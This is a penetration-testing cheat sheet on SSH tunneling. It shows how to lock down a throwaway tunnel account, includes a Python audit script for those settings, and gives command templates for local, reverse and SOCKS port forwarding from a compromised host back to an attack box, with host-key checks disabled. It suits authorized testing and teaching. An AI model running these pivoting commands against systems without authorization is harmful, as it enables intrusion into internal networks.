SSH Port Forwarding
Security Considerations
Reverse Tunneling
- This will require you to establish an SSH connection from the foothold back to your attack box.
- You want to limit what that credential can do if it is captured and used against you
Public Key Authentication
- Say you have a throwaway account named junkuser for the purpose of tunneling
- The SSH public key will be placed in /home/junkuser/.ssh/authorized_keys
- With public key authentication, you can prefix the key in the authorized_keys file with options that restrict what it may be used for
Example: authorized_keys
command="echo 'This account is for port forwarding only'",from="192.168.1.11,192.168.1.12",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa public-key-here
Password Authentication
- Public key authentication would be a better choice, because key files are much easier to manage
- If you must use passwords, you can add a Match block to your /etc/ssh/sshd_config file to constrain the user
- You can combine an SSH public key with the Match block as well, to create an even more constrained configuration
- Say you have a throwaway user named junkuser; just append the user Match block to the bottom of the config file
Example: sshd_config
# Match criteria need a keyword: 'User junkuser', not a bare user name
Match User junkuser
    PermitRootLogin no
    PermitTTY no
    PermitUserRC no
    # ForceCommand takes the rest of the line verbatim, so do not wrap it in double quotes;
    # it only runs when a session is requested (ssh -N never requests one)
    ForceCommand echo 'This account is for port forwarding only'
    PasswordAuthentication yes
    PermitEmptyPasswords no
    MaxAuthTries 2
    AllowAgentForwarding no
    X11Forwarding no
    X11UseLocalhost no
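As an added example (not part of this cheat sheet), a small Python audit that parses an authorized_keys entry, including quoted commas in from=, and a sshd_config Match block, and reports which of the restrictions above are missing for a tunnel-only account. It assumes sshd's behaviour of matching option names and keywords case-insensitively, and flags the bare `Match junkuser` form because only `Match User <name>` selects a user.

```python
# Added example (not from the page): audit a tunnel-only SSH account for the restrictions above.
KEY_OPTS = {"command", "from", "no-pty", "no-agent-forwarding", "no-x11-forwarding", "no-user-rc"}
MATCH_OPTS = {"forcecommand": None, "permittty": "no", "allowagentforwarding": "no", "x11forwarding": "no"}

def split_options(entry):
    """Split one authorized_keys line into ({option: value}, key material); commas inside
    double quotes belong to the value (from="a,b") and a backslash escapes the next char."""
    if entry.startswith(("ssh-", "ecdsa-", "sk-")):  # bare key with no options field
        return {}, entry
    opts, cur, quoted, i = {}, "", False, 0
    while i < len(entry):
        c = entry[i]
        if quoted and c == "\\" and i + 1 < len(entry):
            cur += entry[i + 1]; i += 2; continue
        if c == '"':
            quoted = not quoted
        elif c in ", \t" and not quoted:  # end of one option, or of the whole options field
            name, eq, val = cur.partition("=")
            opts[name.lower()] = val if eq else None
            if c != ",":
                return opts, entry[i:].strip()
            cur = ""
        else:
            cur += c
        i += 1
    raise ValueError("no key material after the options field")

def audit_key(entry):
    """Restriction options the entry lacks; [] means it matches the junkuser pattern."""
    opts, _ = split_options(entry)
    missing = sorted(KEY_OPTS - set(opts))
    if "from" in opts and opts["from"] in ("", "*"):  # wildcard from= pins no source address
        missing.append("from=<specific addresses>")
    return missing

def audit_match(config_text, user):
    """Match-block settings missing or weaker than the page's block for `user` ([] = acceptable).
    Only `Match User <name>` activates a block; the bare `Match junkuser` form matches nothing."""
    settings, active = {}, False
    for raw in config_text.splitlines():
        parts = raw.strip().split(None, 1)
        if not parts or parts[0].startswith("#"):
            continue
        kw, arg = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if kw == "match":
            crit = arg.split()
            active = len(crit) >= 2 and crit[0].lower() == "user" and user in crit[1].split(",")
        elif active:
            settings[kw] = arg
    return sorted(k for k, want in MATCH_OPTS.items() if k not in settings or (want and settings[k].lower() != want))
```

Run it over the real files with `audit_key(line)` for each line of ~junkuser/.ssh/authorized_keys and `audit_match(open("/etc/ssh/sshd_config").read(), "junkuser")`; an empty list from both means the account is limited the way the examples intend.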
Individual Port Forwarding
- A service on a compromised host is listening on 127.0.0.1 (loopback), so it is not reachable directly
- Open a port on the attack box and forward traffic to the remote port
Local Port to Remote Port
Step 1. Establish SSH Tunnel from Local
[Attack Box] [+]==========[SSH]========>> [Remote]
127.0.0.1:[port] ----------------------> 127.0.0.1:[port]
[+] connections to the attack-box port travel through the tunnel to the remote port
Step 2. Forward Local Port to Remote Port
# Generic Command
# ---------------
# -f backgrounds ssh after authentication; -N requests no remote command (forwarding only)
# The two -o options skip host key verification entirely; pin the host key instead where
# you can, especially for tunnels that terminate on your own box
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port user@target
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target
# Multiple Port Forward (as many -L as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -L attack-ip:attack-port:remote-ip:remote-port user@target
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target
# [+] Open port 43306 on 127.0.0.1 attack box
# [+] Forward to 127.0.0.1:3306 on remote via SSH tunnel
Reverse Local Port to Remote Port
Step 1. Establish SSH Tunnel from Remote
[Attack Box] <<=========[SSH]========[+] [Remote]
127.0.0.1:[port] ----------------------> 127.0.0.1:[port]
[+] connections to the attack-box port travel back through the tunnel to the remote port
Step 2. Reverse Forward Attack Box Port to Remote
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip
# Multiple Port Forward (as many -R as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip
# [+] Open port 43306 on 127.0.0.1 attack box
# [+] Reverse forward to 127.0.0.1:3306 on remote via SSH tunnel
Forward Dynamic SOCKS Proxy
- Create a SOCKS proxy that routes all traffic from attack box to the compromised host
- The compromised host is a transparent proxy and all packets exit out from the compromised host's interface
Step 1. Establish SSH Tunnel from Local
[Attack Box] [+]=========[SSH]========>> [Remote] ===[Proxy Traffic]==>> [Remote Network(s)]
127.0.0.1:[port]
[+] SOCKS listener on the attack box; proxied traffic enters here and exits from Remote's interface
Step 2. Create a Transparent SOCKS Proxy with Remote Acting as Jump Host
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port user@target
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target
# [+] Open port 50001 on 127.0.0.1 attack box
# [+] Forward transparently to any host routable via the target
Reverse Dynamic SOCKS Proxy
- REQUIRES AT LEAST OpenSSH Client 7.6!
- Create a SOCKS4 proxy that lets you route all traffic from Kali through the tunnel on the specified port
- Convenient when SSH is running on a compromised host, but you don't have an SSH credential
- Create a dummy account on Kali (locked down as described under Security Considerations), generate an SSH key pair, transfer the private key to the target, and run the command below on the target
Step 1. Establish SSH Tunnel from Remote
[Attack Box] <<========[SSH]=========[+] [Remote] ===[Proxy Traffic]==>> [Remote Network(s)]
127.0.0.1:[port]
[+] SOCKS listener on the attack box; proxied traffic enters here and exits from Remote's interface
Step 2. Create a Transparent Reverse SOCKS Proxy with Remote Acting as Jump Host
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port user@attack-box-ip
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip
# [+] Open port 50001 on 127.0.0.1 attack box
# [+] Forward transparently to any host routable via the target